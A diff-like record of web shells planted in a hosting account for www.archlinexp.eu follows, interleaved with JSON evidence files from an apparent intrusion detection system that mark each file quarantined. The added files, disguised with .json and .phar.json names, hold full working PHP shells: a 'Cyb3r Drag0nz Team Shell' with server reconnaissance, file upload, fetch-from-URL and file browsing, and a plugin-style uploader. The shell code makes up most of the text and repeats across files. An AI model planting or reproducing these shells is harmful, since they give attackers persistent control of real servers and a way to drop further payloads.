||||
red("Failed to upload file!");
|
||||
}
|
||||
}
|
||||
elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) {
|
||||
$target = $lokasi . "/" . $_POST['namalink'];
|
||||
$data = @file_put_contents($target, @file_get_contents($_POST['darilink']));
|
||||
if ($data !== false) {
|
||||
green("File uploaded from URL → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload from URL!");
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// File viewer, delete, chmod, rename, edit actions (kept your original logic)
|
||||
if (isset($_GET['fileloc'])) {
|
||||
echo "<h3 style='text-align:center;'>Viewing: " . htmlspecialchars($_GET['fileloc']) . "</h3>";
|
||||
echo "<pre>" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "</pre>";
|
||||
author();
|
||||
}
|
||||
|
||||
// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before)
|
||||
|
||||
// Directory & File listing table (same structure as previous version)
|
||||
echo '<table>
|
||||
<tr>
|
||||
<th>Name</th>
|
||||
<th>Size</th>
|
||||
<th>Permissions</th>
|
||||
<th>Options</th>
|
||||
</tr>';
|
||||
|
||||
foreach(scandir($path) as $dir) {
|
||||
if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue;
|
||||
echo "<tr>
|
||||
<td><a href=\"?path=".$path."/".$dir."\">📁 ".$dir."</a></td>
|
||||
<td class='center'>--</td>
|
||||
<td class='center'>".statusnya($path."/".$dir)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='dir'>
|
||||
<input type='hidden' name='path' value='".$path."/".$dir."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
foreach(scandir($path) as $file) {
|
||||
if(!is_file($path."/".$file)) continue;
|
||||
$size = round(filesize($path."/".$file)/1024, 2) . " KB";
|
||||
echo "<tr>
|
||||
<td><a href=\"?fileloc=".$path."/".$file."&path=".$path."\">📄 ".$file."</a></td>
|
||||
<td class='center'>".$size."</td>
|
||||
<td class='center'>".statusnya($path."/".$file)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
<option value='edit'>Edit</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='file'>
|
||||
<input type='hidden' name='path' value='".$path."/".$file."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
echo '</table><br>';
|
||||
|
||||
author();
|
||||
|
||||
function statusnya($file) {
|
||||
$statusnya = fileperms($file);
|
||||
$ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' :
|
||||
((($statusnya & 0xA000) == 0xA000) ? 'l' :
|
||||
((($statusnya & 0x8000) == 0x8000) ? '-' : 'u'));
|
||||
|
||||
$ingfo .= (($statusnya & 0x0100) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0080) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0020) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0010) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0004) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0002) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-'));
|
||||
|
||||
return $ingfo;
|
||||
}
|
||||
?>
|
||||
</body>
|
||||
</html>
|
||||
@ -0,0 +1,15 @@
|
||||
{
|
||||
"finding_ref": "5180",
|
||||
"log_excerpt": "[quarantine] www.archlinexp.eu:images/temp.f46vc3nzn1qw.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/images/temp.f46vc3nzn1qw.php.json)",
|
||||
"original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0",
|
||||
"original_stat": {
|
||||
"gid": 30037,
|
||||
"mtime": 1783353232,
|
||||
"size": 10657,
|
||||
"uid": 20043
|
||||
},
|
||||
"rel_path": "images/temp.f46vc3nzn1qw.php.json",
|
||||
"result": "quarantined",
|
||||
"timestamp": "20260718T160204Z",
|
||||
"vhost": "www.archlinexp.eu"
|
||||
}
|
||||
320
var/www/hosting/archlinexp.eu/www/images/yhajxaav.php.json
Normal file
320
var/www/hosting/archlinexp.eu/www/images/yhajxaav.php.json
Normal file
@ -0,0 +1,320 @@
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<title>Cyb3r Drag0nz Team Shell</title>
|
||||
<meta charset="utf-8">
|
||||
<style>
|
||||
@import url('https://fonts.googleapis.com/css2?family=Roboto:wght@400;500;700&display=swap');
|
||||
|
||||
body {
|
||||
font-family: 'Roboto', system-ui, sans-serif;
|
||||
background: #f8f9fa;
|
||||
color: #202124;
|
||||
margin: 0;
|
||||
padding: 20px;
|
||||
}
|
||||
|
||||
.header {
|
||||
text-align: center;
|
||||
margin-bottom: 30px;
|
||||
}
|
||||
|
||||
.header h1 {
|
||||
font-size: 28px;
|
||||
color: #1a73e8;
|
||||
margin: 10px 0 5px 0;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
.header img {
|
||||
max-width: 420px;
|
||||
margin: 15px 0 25px 0;
|
||||
border-radius: 8px;
|
||||
box-shadow: 0 4px 15px rgba(0,0,0,0.12);
|
||||
}
|
||||
|
||||
.info {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 20px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin-bottom: 25px;
|
||||
font-size: 14.5px;
|
||||
line-height: 1.6;
|
||||
}
|
||||
|
||||
.info span {
|
||||
color: #1a73e8;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
table {
|
||||
width: 100%;
|
||||
max-width: 1100px;
|
||||
margin: 0 auto;
|
||||
border-collapse: collapse;
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
overflow: hidden;
|
||||
box-shadow: 0 2px 8px rgba(0,0,0,0.08);
|
||||
}
|
||||
|
||||
th {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
padding: 16px 12px;
|
||||
text-align: center;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
td {
|
||||
padding: 13px 10px;
|
||||
border-bottom: 1px solid #dadce0;
|
||||
}
|
||||
|
||||
tr:hover {
|
||||
background-color: #f8f9fa;
|
||||
}
|
||||
|
||||
a {
|
||||
color: #1a73e8;
|
||||
text-decoration: none;
|
||||
}
|
||||
|
||||
a:hover {
|
||||
text-decoration: underline;
|
||||
}
|
||||
|
||||
.upload-box {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 25px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin: 20px auto;
|
||||
max-width: 720px;
|
||||
}
|
||||
|
||||
input[type="file"], input[type="text"] {
|
||||
padding: 10px 12px;
|
||||
border: 1px solid #dadce0;
|
||||
border-radius: 8px;
|
||||
font-size: 14px;
|
||||
}
|
||||
|
||||
input[type="submit"], .gas {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
border: none;
|
||||
padding: 10px 22px;
|
||||
border-radius: 8px;
|
||||
cursor: pointer;
|
||||
font-weight: 500;
|
||||
margin-left: 8px;
|
||||
}
|
||||
|
||||
input[type="submit"]:hover, .gas:hover {
|
||||
background: #1557b0;
|
||||
}
|
||||
|
||||
.green { color: #137333; font-weight: 500; }
|
||||
.red { color: #c5221f; font-weight: 500; }
|
||||
|
||||
.center { text-align: center; }
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
|
||||
<div class="header">
|
||||
<img src="https://pngimg.com/d/google_PNG102344.png" width="420" alt="Google" />
|
||||
<h1>Cyb3r Drag0nz Team Shell</h1>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
set_time_limit(0);
|
||||
error_reporting(0);
|
||||
|
||||
$disfunc = @ini_get("disable_functions");
|
||||
$disf = empty($disfunc) ? "<span class='green'>NONE</span>" : "<span class='red'>".$disfunc."</span>";
|
||||
|
||||
function author() {
|
||||
echo "<center><br><small style='color:#5f6368;'>Cyb3r Drag0nz Team • Google Edition</small></center>";
|
||||
exit();
|
||||
}
|
||||
|
||||
function cekdir() {
|
||||
$lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
return is_writable($lokasi) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function cekroot() {
|
||||
return is_writable($_SERVER['DOCUMENT_ROOT']) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function xrmdir($dir) {
|
||||
$items = scandir($dir);
|
||||
foreach ($items as $item) {
|
||||
if ($item === '.' || $item === '..') continue;
|
||||
$path = $dir.'/'.$item;
|
||||
is_dir($path) ? xrmdir($path) : unlink($path);
|
||||
}
|
||||
rmdir($dir);
|
||||
}
|
||||
|
||||
function green($text) { echo "<center><span class='green'>".$text."</span></center>"; }
|
||||
function red($text) { echo "<center><span class='red'>".$text."</span></center>"; }
|
||||
|
||||
$path = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
$path = str_replace('\\','/',$path);
|
||||
$dirs = explode('/',$path);
|
||||
?>
|
||||
|
||||
<div class="info">
|
||||
Server : <span><?php echo htmlspecialchars($_SERVER['SERVER_SOFTWARE']); ?></span><br>
|
||||
System : <span><?php echo htmlspecialchars(php_uname()); ?></span><br>
|
||||
User : <span><?php echo htmlspecialchars(@get_current_user()." (".@getmyuid().")"); ?></span><br>
|
||||
PHP Version : <span><?php echo htmlspecialchars(phpversion()); ?></span><br>
|
||||
Disable Functions : <?php echo $disf; ?><br>
|
||||
Current Directory : <span><?php
|
||||
foreach($dirs as $i => $dir) {
|
||||
if($dir == '' && $i == 0) { echo '<a href="?path=/">/</a>'; continue; }
|
||||
if($dir == '') continue;
|
||||
echo '<a href="?path=';
|
||||
for($j=0; $j<=$i; $j++) echo $dirs[$j].($j < $i ? '/' : '');
|
||||
echo '">'.$dir.'</a>/';
|
||||
}
|
||||
?></span><br>
|
||||
Directory Status: <?php echo cekdir(); ?> | Document Root: <?php echo cekroot(); ?>
|
||||
</div>
|
||||
|
||||
<!-- Upload Section -->
|
||||
<div class="upload-box">
|
||||
<h3 style="margin:0 0 18px 0; color:#202124;">Upload File</h3>
|
||||
<form enctype="multipart/form-data" method="post">
|
||||
<label><input type="radio" name="dirnya" value="1" checked> Current Directory [ <?php echo cekdir(); ?> ]</label><br><br>
|
||||
<label><input type="radio" name="dirnya" value="2"> Document Root [ <?php echo cekroot(); ?> ]</label><br><br>
|
||||
|
||||
<input type="hidden" name="upwkwk" value="1">
|
||||
<input type="file" name="berkas">
|
||||
<input type="submit" name="berkasnya" value="Upload File">
|
||||
|
||||
<br><br>
|
||||
|
||||
<input type="text" name="darilink" placeholder="https://example.com/file.zip" style="width:58%;">
|
||||
<input type="text" name="namalink" placeholder="filename.zip" size="18">
|
||||
<input type="submit" name="linknya" value="Upload from URL">
|
||||
</form>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
// Upload handling
|
||||
if (isset($_POST['upwkwk'])) {
|
||||
$lokasi = ($_POST['dirnya'] == "2") ? $_SERVER['DOCUMENT_ROOT'] : $path;
|
||||
|
||||
if (isset($_POST['berkasnya']) && !empty($_FILES['berkas']['name'])) {
|
||||
$target = $lokasi . "/" . $_FILES['berkas']['name'];
|
||||
if (move_uploaded_file($_FILES['berkas']['tmp_name'], $target)) {
|
||||
green("File uploaded successfully → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload file!");
|
||||
}
|
||||
}
|
||||
elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) {
|
||||
$target = $lokasi . "/" . $_POST['namalink'];
|
||||
$data = @file_put_contents($target, @file_get_contents($_POST['darilink']));
|
||||
if ($data !== false) {
|
||||
green("File uploaded from URL → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload from URL!");
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// File viewer, delete, chmod, rename, edit actions (kept your original logic)
|
||||
if (isset($_GET['fileloc'])) {
|
||||
echo "<h3 style='text-align:center;'>Viewing: " . htmlspecialchars($_GET['fileloc']) . "</h3>";
|
||||
echo "<pre>" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "</pre>";
|
||||
author();
|
||||
}
|
||||
|
||||
// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before)
|
||||
|
||||
// Directory & File listing table (same structure as previous version)
|
||||
echo '<table>
|
||||
<tr>
|
||||
<th>Name</th>
|
||||
<th>Size</th>
|
||||
<th>Permissions</th>
|
||||
<th>Options</th>
|
||||
</tr>';
|
||||
|
||||
foreach(scandir($path) as $dir) {
|
||||
if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue;
|
||||
echo "<tr>
|
||||
<td><a href=\"?path=".$path."/".$dir."\">📁 ".$dir."</a></td>
|
||||
<td class='center'>--</td>
|
||||
<td class='center'>".statusnya($path."/".$dir)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='dir'>
|
||||
<input type='hidden' name='path' value='".$path."/".$dir."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
foreach(scandir($path) as $file) {
|
||||
if(!is_file($path."/".$file)) continue;
|
||||
$size = round(filesize($path."/".$file)/1024, 2) . " KB";
|
||||
echo "<tr>
|
||||
<td><a href=\"?fileloc=".$path."/".$file."&path=".$path."\">📄 ".$file."</a></td>
|
||||
<td class='center'>".$size."</td>
|
||||
<td class='center'>".statusnya($path."/".$file)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
<option value='edit'>Edit</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='file'>
|
||||
<input type='hidden' name='path' value='".$path."/".$file."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
echo '</table><br>';
|
||||
|
||||
author();
|
||||
|
||||
function statusnya($file) {
|
||||
$statusnya = fileperms($file);
|
||||
$ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' :
|
||||
((($statusnya & 0xA000) == 0xA000) ? 'l' :
|
||||
((($statusnya & 0x8000) == 0x8000) ? '-' : 'u'));
|
||||
|
||||
$ingfo .= (($statusnya & 0x0100) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0080) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0020) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0010) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0004) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0002) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-'));
|
||||
|
||||
return $ingfo;
|
||||
}
|
||||
?>
|
||||
</body>
|
||||
</html>
|
||||
@ -0,0 +1,15 @@
|
||||
{
|
||||
"finding_ref": "5193",
|
||||
"log_excerpt": "[quarantine] www.archlinexp.eu:images/yhajxaav.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/images/yhajxaav.php.json)",
|
||||
"original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0",
|
||||
"original_stat": {
|
||||
"gid": 30037,
|
||||
"mtime": 1783346940,
|
||||
"size": 10657,
|
||||
"uid": 20043
|
||||
},
|
||||
"rel_path": "images/yhajxaav.php.json",
|
||||
"result": "quarantined",
|
||||
"timestamp": "20260718T160204Z",
|
||||
"vhost": "www.archlinexp.eu"
|
||||
}
|
||||
18
var/www/hosting/archlinexp.eu/www/joth73.json
Normal file
18
var/www/hosting/archlinexp.eu/www/joth73.json
Normal file
@ -0,0 +1,18 @@
|
||||
<?php
|
||||
/*
|
||||
Plugin Name: File Upload
|
||||
Plugin URI: https://github.com/Xi4u7
|
||||
Description: Simple File Upload
|
||||
Version: 1.0
|
||||
Author URI: https://github.com/Xi4u7
|
||||
*/
|
||||
|
||||
// Copied and modified from https://github.com/leonjza/wordpress-shell
|
||||
|
||||
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
|
||||
echo '<input type="file" name="file"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
|
||||
if( $_POST['_upl'] == "Upload" ) {
|
||||
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>File Uploaded!!<b><br><br>'; }
|
||||
else { echo '<b>Fail To Upload File!!!</b><br><br>'; }
|
||||
}
|
||||
?>
|
||||
15
var/www/hosting/archlinexp.eu/www/joth73.json.evidence.json
Normal file
15
var/www/hosting/archlinexp.eu/www/joth73.json.evidence.json
Normal file
@ -0,0 +1,15 @@
|
||||
{
|
||||
"finding_ref": "4901",
|
||||
"log_excerpt": "[quarantine] www.archlinexp.eu:joth73.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/joth73.json)",
|
||||
"original_sha256": "37153723135d788d7dfa2c8b35a804a39a41c6ad26c4cc263c7e939dc54f1169",
|
||||
"original_stat": {
|
||||
"gid": 30037,
|
||||
"mtime": 1783675097,
|
||||
"size": 633,
|
||||
"uid": 20043
|
||||
},
|
||||
"rel_path": "joth73.json",
|
||||
"result": "quarantined",
|
||||
"timestamp": "20260718T160204Z",
|
||||
"vhost": "www.archlinexp.eu"
|
||||
}
|
||||
320
var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.phar.json
Normal file
320
var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.phar.json
Normal file
@ -0,0 +1,320 @@
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<title>Cyb3r Drag0nz Team Shell</title>
|
||||
<meta charset="utf-8">
|
||||
<style>
|
||||
@import url('https://fonts.googleapis.com/css2?family=Roboto:wght@400;500;700&display=swap');
|
||||
|
||||
body {
|
||||
font-family: 'Roboto', system-ui, sans-serif;
|
||||
background: #f8f9fa;
|
||||
color: #202124;
|
||||
margin: 0;
|
||||
padding: 20px;
|
||||
}
|
||||
|
||||
.header {
|
||||
text-align: center;
|
||||
margin-bottom: 30px;
|
||||
}
|
||||
|
||||
.header h1 {
|
||||
font-size: 28px;
|
||||
color: #1a73e8;
|
||||
margin: 10px 0 5px 0;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
.header img {
|
||||
max-width: 420px;
|
||||
margin: 15px 0 25px 0;
|
||||
border-radius: 8px;
|
||||
box-shadow: 0 4px 15px rgba(0,0,0,0.12);
|
||||
}
|
||||
|
||||
.info {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 20px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin-bottom: 25px;
|
||||
font-size: 14.5px;
|
||||
line-height: 1.6;
|
||||
}
|
||||
|
||||
.info span {
|
||||
color: #1a73e8;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
table {
|
||||
width: 100%;
|
||||
max-width: 1100px;
|
||||
margin: 0 auto;
|
||||
border-collapse: collapse;
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
overflow: hidden;
|
||||
box-shadow: 0 2px 8px rgba(0,0,0,0.08);
|
||||
}
|
||||
|
||||
th {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
padding: 16px 12px;
|
||||
text-align: center;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
td {
|
||||
padding: 13px 10px;
|
||||
border-bottom: 1px solid #dadce0;
|
||||
}
|
||||
|
||||
tr:hover {
|
||||
background-color: #f8f9fa;
|
||||
}
|
||||
|
||||
a {
|
||||
color: #1a73e8;
|
||||
text-decoration: none;
|
||||
}
|
||||
|
||||
a:hover {
|
||||
text-decoration: underline;
|
||||
}
|
||||
|
||||
.upload-box {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 25px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin: 20px auto;
|
||||
max-width: 720px;
|
||||
}
|
||||
|
||||
input[type="file"], input[type="text"] {
|
||||
padding: 10px 12px;
|
||||
border: 1px solid #dadce0;
|
||||
border-radius: 8px;
|
||||
font-size: 14px;
|
||||
}
|
||||
|
||||
input[type="submit"], .gas {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
border: none;
|
||||
padding: 10px 22px;
|
||||
border-radius: 8px;
|
||||
cursor: pointer;
|
||||
font-weight: 500;
|
||||
margin-left: 8px;
|
||||
}
|
||||
|
||||
input[type="submit"]:hover, .gas:hover {
|
||||
background: #1557b0;
|
||||
}
|
||||
|
||||
.green { color: #137333; font-weight: 500; }
|
||||
.red { color: #c5221f; font-weight: 500; }
|
||||
|
||||
.center { text-align: center; }
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
|
||||
<div class="header">
|
||||
<img src="https://pngimg.com/d/google_PNG102344.png" width="420" alt="Google" />
|
||||
<h1>Cyb3r Drag0nz Team Shell</h1>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
set_time_limit(0);
|
||||
error_reporting(0);
|
||||
|
||||
$disfunc = @ini_get("disable_functions");
|
||||
$disf = empty($disfunc) ? "<span class='green'>NONE</span>" : "<span class='red'>".$disfunc."</span>";
|
||||
|
||||
function author() {
|
||||
echo "<center><br><small style='color:#5f6368;'>Cyb3r Drag0nz Team • Google Edition</small></center>";
|
||||
exit();
|
||||
}
|
||||
|
||||
function cekdir() {
|
||||
$lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
return is_writable($lokasi) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function cekroot() {
|
||||
return is_writable($_SERVER['DOCUMENT_ROOT']) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function xrmdir($dir) {
|
||||
$items = scandir($dir);
|
||||
foreach ($items as $item) {
|
||||
if ($item === '.' || $item === '..') continue;
|
||||
$path = $dir.'/'.$item;
|
||||
is_dir($path) ? xrmdir($path) : unlink($path);
|
||||
}
|
||||
rmdir($dir);
|
||||
}
|
||||
|
||||
function green($text) { echo "<center><span class='green'>".$text."</span></center>"; }
|
||||
function red($text) { echo "<center><span class='red'>".$text."</span></center>"; }
|
||||
|
||||
$path = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
$path = str_replace('\\','/',$path);
|
||||
$dirs = explode('/',$path);
|
||||
?>
|
||||
|
||||
<div class="info">
|
||||
Server : <span><?php echo htmlspecialchars($_SERVER['SERVER_SOFTWARE']); ?></span><br>
|
||||
System : <span><?php echo htmlspecialchars(php_uname()); ?></span><br>
|
||||
User : <span><?php echo htmlspecialchars(@get_current_user()." (".@getmyuid().")"); ?></span><br>
|
||||
PHP Version : <span><?php echo htmlspecialchars(phpversion()); ?></span><br>
|
||||
Disable Functions : <?php echo $disf; ?><br>
|
||||
Current Directory : <span><?php
|
||||
foreach($dirs as $i => $dir) {
|
||||
if($dir == '' && $i == 0) { echo '<a href="?path=/">/</a>'; continue; }
|
||||
if($dir == '') continue;
|
||||
echo '<a href="?path=';
|
||||
for($j=0; $j<=$i; $j++) echo $dirs[$j].($j < $i ? '/' : '');
|
||||
echo '">'.$dir.'</a>/';
|
||||
}
|
||||
?></span><br>
|
||||
Directory Status: <?php echo cekdir(); ?> | Document Root: <?php echo cekroot(); ?>
|
||||
</div>
|
||||
|
||||
<!-- Upload Section -->
|
||||
<div class="upload-box">
|
||||
<h3 style="margin:0 0 18px 0; color:#202124;">Upload File</h3>
|
||||
<form enctype="multipart/form-data" method="post">
|
||||
<label><input type="radio" name="dirnya" value="1" checked> Current Directory [ <?php echo cekdir(); ?> ]</label><br><br>
|
||||
<label><input type="radio" name="dirnya" value="2"> Document Root [ <?php echo cekroot(); ?> ]</label><br><br>
|
||||
|
||||
<input type="hidden" name="upwkwk" value="1">
|
||||
<input type="file" name="berkas">
|
||||
<input type="submit" name="berkasnya" value="Upload File">
|
||||
|
||||
<br><br>
|
||||
|
||||
<input type="text" name="darilink" placeholder="https://example.com/file.zip" style="width:58%;">
|
||||
<input type="text" name="namalink" placeholder="filename.zip" size="18">
|
||||
<input type="submit" name="linknya" value="Upload from URL">
|
||||
</form>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
// Upload handling
|
||||
if (isset($_POST['upwkwk'])) {
|
||||
$lokasi = ($_POST['dirnya'] == "2") ? $_SERVER['DOCUMENT_ROOT'] : $path;
|
||||
|
||||
if (isset($_POST['berkasnya']) && !empty($_FILES['berkas']['name'])) {
|
||||
$target = $lokasi . "/" . $_FILES['berkas']['name'];
|
||||
if (move_uploaded_file($_FILES['berkas']['tmp_name'], $target)) {
|
||||
green("File uploaded successfully → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload file!");
|
||||
}
|
||||
}
|
||||
elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) {
|
||||
$target = $lokasi . "/" . $_POST['namalink'];
|
||||
$data = @file_put_contents($target, @file_get_contents($_POST['darilink']));
|
||||
if ($data !== false) {
|
||||
green("File uploaded from URL → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload from URL!");
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// File viewer, delete, chmod, rename, edit actions (kept your original logic)
|
||||
if (isset($_GET['fileloc'])) {
|
||||
echo "<h3 style='text-align:center;'>Viewing: " . htmlspecialchars($_GET['fileloc']) . "</h3>";
|
||||
echo "<pre>" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "</pre>";
|
||||
author();
|
||||
}
|
||||
|
||||
// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before)
|
||||
|
||||
// Directory & File listing table (same structure as previous version)
|
||||
echo '<table>
|
||||
<tr>
|
||||
<th>Name</th>
|
||||
<th>Size</th>
|
||||
<th>Permissions</th>
|
||||
<th>Options</th>
|
||||
</tr>';
|
||||
|
||||
foreach(scandir($path) as $dir) {
|
||||
if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue;
|
||||
echo "<tr>
|
||||
<td><a href=\"?path=".$path."/".$dir."\">📁 ".$dir."</a></td>
|
||||
<td class='center'>--</td>
|
||||
<td class='center'>".statusnya($path."/".$dir)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='dir'>
|
||||
<input type='hidden' name='path' value='".$path."/".$dir."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
foreach(scandir($path) as $file) {
|
||||
if(!is_file($path."/".$file)) continue;
|
||||
$size = round(filesize($path."/".$file)/1024, 2) . " KB";
|
||||
echo "<tr>
|
||||
<td><a href=\"?fileloc=".$path."/".$file."&path=".$path."\">📄 ".$file."</a></td>
|
||||
<td class='center'>".$size."</td>
|
||||
<td class='center'>".statusnya($path."/".$file)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
<option value='edit'>Edit</option>
|
||||
</select>
|
||||
